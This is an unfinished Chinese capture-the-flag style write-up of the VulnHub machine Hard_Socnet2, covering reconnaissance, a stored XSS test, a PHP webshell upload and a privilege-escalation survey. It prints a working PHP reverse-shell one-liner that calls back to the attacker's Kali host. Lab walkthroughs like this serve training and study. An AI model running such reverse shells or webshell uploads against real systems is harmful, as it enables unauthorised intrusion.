VulnHub靶机-Hard_Socnet2 |红队打靶03

靶机地址:

https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova

一、主机发现

netdiscover -r 192.168.56.0/24

在这里插入图片描述

靶机的ip:192.168.56.101

kali的ip:192.168.56.102

二、对靶机进一步探测

1、对靶机开放端口、运行的服务和操作系统进行探测

nmap -sV -sC -O -p- 192.168.56.101

在这里插入图片描述

靶机开放了22,80,8000三个端口
22跑的是OpenSSH的服务,80端口是apache的http服务,8000端口是python运行的一个BaseHTTPServer;
操作系统探测是Linux 3.2 - 4.9 。

2、访问80,8000端口的http服务

访问8000端口,提示请求方法不对,那么利用burp批量探测一下
在这里插入图片描述
都不行
在这里插入图片描述
访问80端口,是一个登录框,可以注册用户,注册进去看一下

进去后是个类似留言板的东西,输入个xss语句,还真的执行了
在这里插入图片描述
发现还可以上传图片,通过浏览器插件看到脚本语言是php和python
在这里插入图片描述

三、获取shell

上传个php的webshell,右击刚才上传图片的地址,用冰蝎连接
在这里插入图片描述
成功拿到网站的shell,看一下是否在docker里,发现不在
在这里插入图片描述

四、提权

反弹shell

在蚁剑端,将shell反弹到kali
在这里插入图片描述

php -r '$sock=fsockopen("192.168.56.102",443);exec("/bin/sh -i <&3 >&3 2>&3");'

反弹成功
在这里插入图片描述
查看sudo -l,自动任务/etc/crontab,都没有可以利用的
在这里插入图片描述

当来到home下,发现有socnet用户,进去发现ls -la发现一个拥有suid和guid权限的文件,add_record,且是个可执行的文件
在这里插入图片描述
留言中admin提到一个monitor.py文件,刚好在这个文件中,查看一下
在这里插入图片描述
发现引入了SimpleXMLRPCServer这个模块,并且这个服务开放在8000端口,这也就解释了前面为什么8000端口,用平常的http请求方法访问不了

代码审计

待定
在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值